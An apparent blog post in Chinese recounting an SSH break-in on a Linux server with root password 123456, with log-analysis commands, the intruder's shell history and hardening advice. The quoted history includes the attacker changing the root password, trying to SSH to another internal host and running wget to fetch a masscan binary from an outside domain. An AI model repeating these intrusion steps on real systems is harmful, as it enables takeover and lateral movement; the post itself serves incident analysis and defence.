root密碼被修改
新裝機的Linux服務器替換老服務器,而且接通了外網,以前一直覺得外網SSH的22端口是不通的,都是在內網跳板機SSH登錄,因此沒太注意密碼複雜度,裝機時root密碼設爲123456了。而實際上外網的22端口是開放的。次日發現SSH登錄不了,提示密碼錯誤。運維人員進入機房 採用單用戶模式進入服務器修改密碼,才又能夠登錄。 
html
拿回密碼以後排查被入侵過程以下。git
誰成功登錄過?
[root@localhost home]# grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}' #secure文件每週歸檔加上-歸檔時間,若是查上週登錄將secure改成secure-上週最後一天日期
Jun 08 21:21:26 root 10.1.1.5 #登陸成功的日期、時間、用戶名、IP
Jun 08 22:52:48 root 10.1.1.5 【跳板機使用123456登錄】
Jun 08 23:24:27 root 10.1.1.5
Jun 09 00:08:29 root 194.165.16.45 【俄羅斯IP,外網使用123456登錄】
Jun 09 01:19:39 root 223.112.28.14 【南京IP,外網使用123456登錄】
Jun 09 01:20:16 root 92.80.248.158 【羅馬尼亞IP,外網使用123456登錄】
Jun 09 16:06:38 root 10.1.1.5
Jun 09 16:10:00 root 10.1.1.5 【單用戶修改密碼後跳板機能夠登錄】
複製代碼
執行grep "Failed password for root" /var/log/secure | awk '{print $11}' 查看看本身的服務器有沒有人嘗試破解github
入侵者登錄後作了什麼?
[root@localhost home]#history | more 【去除本身執行的指令,剩下的就是入侵者的指令】
548 w 【查看登錄用戶】
549 ls
550 free -mt 【查看內存】
551 lscpu
552 cat /proc/cpu info
553 cat /pro/cpcuinfo #查看cpu信息
554 cat /proc/cpuinfo
555 ifconfig
556 ssh 10.1.1.26 【嘗試內網其它服務器,若是其它服務器密碼簡單也會被攻陷】
557 w
558 passwd 【修改root密碼】
559 wget nasapaul.com/masscan 【下載端口掃描工具,沒成功】
560 wget
561 ls
562 df -h
563 nvidia-smi
564 w
565 ls
566 cat /etc/hosts
567 top
複製代碼
入侵者沒有過多操做,改了root密碼就離開了。不太清楚他會之後再來,仍是到此爲止。搜索nasapaul,能夠看到一些其它服務器被攻擊的信息,網上有個羅馬尼亞黑客網名叫paul,高調囂張,專門入侵服務器,而且不斷在內網破解其它服務器的密碼,利用服務器算力挖門羅幣。結合登錄IP有羅馬尼亞地址,極可能就是這我的。
他在這臺服務器上只修改了密碼就離開了,沒有部署挖礦程序。服務器
結論
替換以前的老服務器外網端口也是開的,可是多年未被登錄,就是由於密碼比較複雜。
此事的教訓就是運維
- root密碼必定要有複雜度,一方面你認爲不通外網的服務器未必不通外網。另外一方面,和你同一局域網的機器被控制了,入侵者以它爲跳板,你也直接面臨來自外網的破解。
- 123456多是最弱的密碼,六個1可能都更好。
- 互聯網SSH端口必定關閉。
- 修改/etc/ssh/sshd_config裏的Port值爲22以外的值,能增長破解難度。
最後,創做不易,若是對你們有所幫助,但願你們點贊支持,有什麼問題也能夠在評論區裏討論😄~ssh